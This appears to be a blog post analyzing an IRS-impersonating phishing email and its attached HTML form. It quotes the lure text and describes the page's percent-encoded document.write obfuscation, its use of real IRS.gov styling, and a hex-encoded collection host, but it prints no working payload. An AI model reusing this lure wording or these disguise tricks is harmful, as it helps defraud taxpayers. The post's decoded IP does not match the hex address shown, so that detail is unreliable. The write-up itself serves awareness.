Every once in a while, a spin around the old spam folder can be interesting just to see what trickery the spammers are up to lately. You never know what the Nigerian Prince has up his sleeve. In a recent foray, I found an entertaining e-mail from the “IRS”. I knew it was a going to be first-rate when I saw the exclamation point in the subject line:
Internal Revenue Service (IRS)
United States Department of the Treasury
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $773.80. Please submit the tax refund request and allow us 6-9 days in order to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline. To access your tax refund, use the form attached to this email.
Internal Revenue Service
First, I have to congratulate the “IRS” for figuring out my e-mail address and connecting it with my tax records. Then there’s the fact that my check will be here within 9 days, that’s fast! Unless, of course, it’s delayed and I never hear from them again. Hopefully my bank account doesn’t slowly empty while I wait.
Once you get beyond the questionable e-mail, though, things actually get a little scary. Attached to the e-mail was an .html file that I was supposed to fill out. Curious how it worked (but not wanting to open the page in a browser), I opened up the source in my favorite text editor. The entire page code was eerily simple:
<!-- HTML Encryption provided by Internal Revenue Service -->
document.write(unescape('[50 KB of percent encoded numbers]'));
The actual content the page writes to the DOM is Percent-encoded (like is used in URLs), making it hard to see what’s going on without rendering it in a browser. Using a nifty decoding tool, I unpacked the HTML. All of the CSS and image resources were linked directly off of the IRS.gov website, making the source and the page look awfully authentic. The only sign of another party being involved was in the site the form was set to submit to. Again, the spammer used some encoding to mask their identity. The form went to http://0x3F.0xDCC619/, which resolves to https://220.127.116.11/. Very crafty people who are definitely not planning to send me a tax refund anytime soon.
Turns out that the IP is owned by Beyond The Network America, a shady spam organization. A quick web search shows their involvement in vanilla spam, phishing attacks, like the one I got, and various other types of Internet chicanery. BTNA has even has the dubious distinction of been being banned from Wikipedia since March of 2007 (#87!). But their spam machine rolls on.
So that was my latest foray into the Spam folder. I found out that my spam was linked to a large spam-sending organization, and that said organization is pretty good at making their fake pages appear authentic. Despite their efforts, though, there were quite a few warning signs that something was amiss, starting with the e-mail itself and ending with the form they wanted me to fill out. A friendly reminder to anyone out there who may be tempted by $800: even if the IRS were looking to contact you about a surprise refund (as if), they would not be e-mailing to ask for your ATM card’s PIN number. Every time someone does ask for that, you can just forward them on their merry way to the FTC’s CAN-SPAM people.
Click the image to see a full-size version of the fake page styled with real IRS resources.